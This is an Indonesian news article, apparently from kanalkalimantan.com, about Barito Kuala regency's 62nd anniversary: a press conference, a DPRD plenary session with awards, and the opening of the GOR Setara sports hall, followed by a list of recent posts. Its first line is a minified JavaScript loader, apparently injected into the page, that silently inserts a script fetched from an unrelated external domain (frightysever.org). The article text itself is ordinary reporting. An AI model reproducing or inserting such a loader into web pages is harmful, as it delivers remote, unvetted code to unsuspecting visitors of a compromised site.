(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Barito Kuala

Kemeriahan Hari Jadi Ke- 62 Kabupaten Batola


KANALKALIMANTAN.COM, MARABAHAN – Pemerintah Kabupaten Barito Kuala menggelar Jumpa Pers dalam rangka menyambut Hari Jadi ke- 62 yang akan jatuh pada 4 Januari 2022. Bertempat di Aula Bahalap, Setda Batola, kegiatan ini dipimpin Wakil Bupati Batola H Rahmadian Noor, dihadiri Ketua DPRD, Sekda, anggota Forkopimda, Kepala SKPD, organisasi kepemudaan dan awak media.

Disampaikan Wakil Bupati Batola H Rahmadian Noor, Hari Jadi ini mengusung tema Simpun Gawi 2022 (tuntaskan pekerjaan di 2022) atau tahun terakhir kepemimpinan Bupati Batola Hj Noormiliyani AS bersamanya.

“Memaknai Hari Jadi Batola ke-62 ini, secara singkat pada 2022 kami akan menyelesaikan visi misi yang telah tertuang dalam RPJMD dari 2017 lalu,” ungkap Wabup yang akrab disapa Rahmadi ini, Selasa (28/12/2021).

Dalam sambutannya, ia memaparkan sejumlah capaian yang bisa dibukukan sepanjang 2021. Mulai dari sektor pendapatan, indeks gini rasio daerah, reformasi dan birokrasi, kepuasan masyarakat, sakip, infrastruktur, angka harapan lama sekolah, harapan hidup, hingga tingkat kemiskinan.

 

Baca juga : Muda Mudi Kedapatan Satpol PP Banjarbaru Bermesraan di Wisata Hutan Pinus Mentaos

Di samping itu, Wabup juga menyampaikan progres sejumlah program prioritas seperti Kutabamara, Bedah Kampung Terintegrasi (BKT), Jejangkit Ecopark dan Permata Bunda.

“Untuk Kutabamara, pengerjaan telah mencapai 79, 33 persen. Kami optimis bisa rampung pada akhir 2022,” tambah Rahmadi.

Mengenai program BKT di 2021 juga berhasil mengeluarkan status enam desa tertinggal menjadi desa berkembang. Program ini akan terus dilanjutkan dengan memfokuskan pada desa-desa yang masih tertinggal menurut indeks IPD.

Adapun progres Jejangkit Ecopark, pengerjaannya terus dilakukan dan ditargetkan Soft Launching pada akhir 2022. Dalam kesempatan ini pula, Rahmadi menyampaikan sejumlah prestasi atau penghargaan yang diterima Pemkab Batola, baik dari Pemprov Kalsel maupun nasional. Seperti penghargaan Kota Layak Anak, Visionery Leader 2021, pelayanan KB dari BKKBN Pusat dan lainnya.

 

Baca juga : Tinggal Sendiri, Laki-laki Ini Ditemukan Tak Bernyawa di Handil Bakti

“Atas capaian prestasi tersebut, saya ucapkan terimakasih. Semuanya adalah hasil kerja keras dan kerja cerdas. Tentunya ini juga merupakan upaya kerjasama kita,” pungkas Rahmadi.

Di penghujung kegiatan jumpa pers ini juga diisi dengan dialog dengan sejumlah perwakilan awak media, mengenai arah dan solusi beberapa PR yang dianggap belum teratasi sepanjang 2021. Seperti pengelolaan pasar, penanganan banjir hingga pembangunan.

Rapat Paripurna dengan Tema Simpun Gawi
Sebelumnya sehari menjelang puncak hari jadi (harjad), Dewan Perwakilan Rakyat Daerah (DPRD) juga menggelar Rapat Paripurna Istimewa dalam rangka memperingati Harjad ke-62 Kabupaten Barito Kuala (Batola) bertema “Simpun Gawi 2022”, Senin (3/1).

Mengenakan pakaian Banjar motif khas Batola berwarna kuning berpadu hijau para petinggi kabupaten beserta anggota dewan mengisi kegiatan rapat dengan sejumlah rangkaian diantaranya, penandatanganan sejumlah prasasti seperti balai penyuluhan KB Kecamatan Jejangkit dan Mekarsari, Gedung Perawatan Dalam Alamanda dan Gedung Perawatan Kelas 1 dan 2 Teratai RSUD Abdul Aziz Marabahan, dan Gedung Puskesmas Kecamatan Barambai.

 

Baca juga : Bantuan 200 Showcase, Bupati Abdul Hadi : Membantu Pertumbuhan Perekonomian

Selanjutnya, penyerahan tali asih kepada 17 ahli waris penuntut terbentuknya kabupaten, pemberian penghargaan kepada desa/kelurahan tercepat pelunasan PBB-P2 tahun 2021, pemberian penghargaan kepada kades/lurah yang inovatif dan memotivasi warga dalam penagihan dan pembayaran PBB-P2 tahun 2021, dan pemberian penghargaan kepada kecamatan yang lunas PBB-P2.

Selain itu, rapat juga berisi pemberian hadiah pengusaha hotel, restoran dan sarang burung walet terbaik dalam pembayaran pajak, pemberian penghargaan kepada SKPD pengelolaan penerimaan retribusi terbaik, penyerahan sertipikat BMD dari Kepala BPN kepada bupati, pemberian penghargaan kepada qori trio golongan dewasa pada MTQ suara emas V tingkat Provinsi Kalsel, pemberian penghargaan kepada SKPD pengelola website terbaik.

Kemudian, penyerahan DPA Tahun 2022 secara simbolis, penyerahan secara simbolis mobil prokes kepada Diskes Batola, hingga pemberian penghargaan pencapaian 70 persen vaksinasi dosis 1 bagi kecamatan dan desa.

Rapat Paripurna tersebut bukan mengutamakan penjelasan dan pemandangan umum fraksi seperti biasa, namun beragenda utama mengenang sejarah lahirnya Kabupaten Berjuluk Bumi Ije Jela.

 

Baca juga : Kini Batola Miliki Incinerator Pembakaran Limbah

Karenanya dalam rangkaian acaranya juga diisi pembacaan riwayat singkat Kabupataen Barito Kuala yang dibacakan Wakil Bupati H Rahmadian Noor.

Bupati Barito Kuala Hj Noormiliyani AS mengucapkan terima kasih kepada dewan yang terhormat yang menggelar Sidang Paripurna Istimewa Peringatan Hari Jadi ke-62 Tahun 2020 Kabupaten Batola.

Dalam sambutannya, mantan Ketua DPRD Provinsi Kalsel itu juga menyampaikan penjelasan terhadap capaian indikator makro pembangunan maupun beberapa capaian lainnya selama kurun waktu empat tahun dua bulan menjabat bersama Wakil Bupati H Rahmadian Noor.

Diantara capaian yang sampaikan Noormiliyani, mulai pendapatan perkapita, indeks gini rasio, indeks reformasi birokrasi, indeks kepuasan masyarakat dan nilai SAKIP, hasil survey penilaian integritas (SPI), capaian ketersediaan infrastruktur perdesaan dan infrastruktur perkotaan, indeks pembangunan manusia, angka harapan lama sekolh, angka rata-rata lama sekolah, angka harapan hidup dan tingkat kemiskinan.

 

Baca juga : Pasokan Batu bara ke PLN Seret, Indonesia di Ambang Krisis Energi

Dalam upaya pemulihan ekonomi di masa pandemi, tutur Noormiliyani, terus dilakukan pengembangan UMKM, optimalisasi sumber pendapatan daerah, pemanfaatan APBD secara tepat sasaran dan efisien di samping melaksanakan program nasional seperti pemberian subsidi bantuan sosial secara tunai.

Di kesempatan rapat paripurna, bupati perempuan pertama di Kalsel ini juga menyampaikan program Kutabamara (program pembuatan jalan yang menghubungkan Kecamatan Kuripan, Tabukan, Bakumpai, dan Marabahan), program bedah kampung terintegrasi (BKT), Jejangkit Ecopark, Program Permata Bunda (Pemberian Makanan Tambahan Ibu Hamil dan Anak Balita).

Yang menarik, di penghujung sambutannya, isteri anggota DPRD Provinsi Kalsel H Hasanuddin Murad ini juga menyampaikan rasa syukur atas capaian 70 persen vaksinasi COVID-19 dosis satu di Kabupaten Batola.

“Saya menyampaikan apresiasi dan ucapan terima kasih kepada semua pihak yang terlibat, mulai dari Komandan Kodim 1005 Batola beserta jajaran, Kapolres beserta jajaran, para kepala dinas/badan, para camat, para kades, dan seluruh pihak yang terlibat,” ucapnya.

 

Baca juga : Perempuan Tewas Bakar Diri Pakai Bensin di Sleman

Ucapan terkhusus juga disampaikan bupati kepada para dokter dan tenaga kesehatan sebagai garda terdepan dalam memerangi COVID-19.

“Dengan tercapainya 70 persen vaksinasi ini kita berharap herd immunity di Kabupaten Barito Kuala bisa terwujud,” harap Noormiliyani.

Rapat paripurna dipimpin Ketua DPRD Saleh dan Wakil Ketua Agung Purnomo serta Hj Arpah itu dihadiri Bupati Batola Hj Noormiliyani AS, Wakil Bupati Batola H Rahmadian Noor, para anggota DPRD, para anggota Forkopimda, Sekda H Zulkipli Yadi Noor, para Staf Ahli Bupati, para Asisten Sekda, para pimpinan SKPD, para camat, para Sekretaris SKPD, Kabag, para pimpinan organisasi wanita, pimpinan instansi vertikal, BUMN, BUMD, perbankan, para alim ulama, guru agama, tokoh agama, para kades, pemuda, para ahli penuntut dan pendiri kabupaten, serta undangan.

Peresmian Gor Setara Oleh Menpora
Dalam rangkaiannya harjad Batola Menteri Pemuda Olahraga (Menpora) Zainudin Amali bertandang ke Kabupaten Barito Kuala (Batola), Selasa (04/02/2022). Kedatangan Menpora ini bertepatan peringatan Hari Jadi ke-62 kabupaten yang berjuluk Bumi Selidah dengan meresmikan Gedung Olahraga (GOR) Setara.

 

Baca juga : Pencurian Terekam CCTV di Banjarmasin, Motor Ditinggal Parkir Dua HP Raib

Menpora menuturkan dengan adanya gedung olahraga di Batola diharapkan mampu menunjang peningkatan kemampuan atlet dan dimanfaatkan bagi mereka yang berbakat untuk berlatih. Sebab, menurutnya fasilitas merupakan kebutuhan vital para atlet yang harus dipenuhi.

“Untuk itu saya berharap dengan adanya gedung ini benar-benar dimanfaatkan dan dirawat, sehingga pembinaan atlit dan prestasi di daerah ini bisa berkesinambungan,” ucap Zainuddin usai meresmikan.

Dalam kesempatan itu, dia didampingi Gubernur Kalsel Sahbirin Noor dan Bupati Batola Noormiliyani AS serta pejabat terkait lainnya meninjau sarana olahraga tersebut. Ia menyebut GOR tersebut sudah sangat representatif.

“Alhamdulilah hari ini saya bisa berada di tengah-tengah hadirin semua untuk turut meresmikan. Karena sebelumnya juga sudah janji sama ibu bupati,” katanya.
Penyerahan penghargaan bagi sejumlah atlet Barito Kuala yang berprestasi di tingkat nasional yang turut dihadiri Menpora.

 

Baca juga : 2.494 Warga Beruntung Baru Berhasil Divaksin, Hasil Gawi Vaksinasi Bergerak Bareng Literasi

Untuk itu sebutnya, bagi para pelatih dan pembina, pengurus KONI dan Pengurus Cabor, dituntut untuk melakukan pembinaan. Sehingga Batola nantinya menjadi penyumbang atlet-atlet nasional yang bisa berlaga di level Internasional.
Peresmian GOR Batola Setara ini juga diisi laga eksebisi pertandingan Bola Voli dan penyerahan penghargaan bagi sejumlah atlet Batola yang berprestasi di tingkat nasional.

Gedung GOR Setara dibangun dari Dana Alokasi Khusus (DAK) tahun 2020 dari Kemenpora senilai Rp 14,4 miliar. GOR dengan tipe B Internasional yang terletak di Jalan Tarutan Marabahan ini sempat digunakan sebagai venue Turnamen Bulu Tangkis Bupati Cup 2021 pada November lalu dan telah mengantongi sertifikat layak guna setelah peninjauan tim dari Kemenpora. (kanalkalimantan.com/rdy)

Reporter : rdy
Editor : kk


Desy Arfianty

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

11 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

11 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

12 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

12 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

12 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

13 jam ago

This website uses cookies.